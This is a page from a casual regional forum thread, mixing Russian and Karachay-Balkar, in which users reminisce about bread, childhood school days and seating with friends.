венгриядан хапар бир айт?ариумуду анда?
Хлеб у них вкусный был))))))))Больше ничего не помню)))Это давно было...лет 20 прошло))))))
А я вот помню шо было лет двацать назад)))джылаб,школгъа барырым келмейди орамда ойнарым келеди деб...зор бла элтиб посадили за парту...и то добился таво шоб два моих боевых товарисча сидели за одной партой)))недолго музыка играла,неделю))после рассадили))
Si vis pacem, para bellum
 
Цитата

Мёлек пишет:
Хлеб у них вкусный был)

....вкусный хлеб в кбр в прогрессе...ненча етсемда останавливаюсь и покупаю...даже поздно ночью можно найти!))
Si vis pacem, para bellum
 
Цитата
legenda пишет:
А я вот помню шо было лет двацать назад)))джылаб,школгъа барырым келмейди орамда ойнарым келеди деб...зор бла элтиб посадили за парту...и то добился таво шоб два моих боевых товарисча сидели за одной партой)))недолго музыка играла,неделю))после рассадили))
Первый классхамы баргъанса 20 лет назад?))))))
Религиозность – это не только нахождение в мечети, но и хорошие взаимоотношения с людьми и благой нрав. Вот на эти качества должна обратить внимание молодежь при выборе второй половинки.
 
Цитата

бездушный кролик пишет:
Цитатаlegenda пишет:
А я вот помню шо было лет двацать назад)))джылаб,школгъа барырым келмейди орамда ойнарым келеди деб...зор бла элтиб посадили за парту...и то добился таво шоб два моих боевых товарисча сидели за одной партой)))недолго музыка играла,неделю))после рассадили))
Первый классхамы баргъанса 20 лет назад?))))))

Хоу))сюйюб бармагъанем,за меня решали тогда))
Si vis pacem, para bellum
Страницы: Пред. 1 ... 105 106 107 108 109 ... 112 След.
Читают тему (гостей: 1)

Форум  Мобильный | Стационарный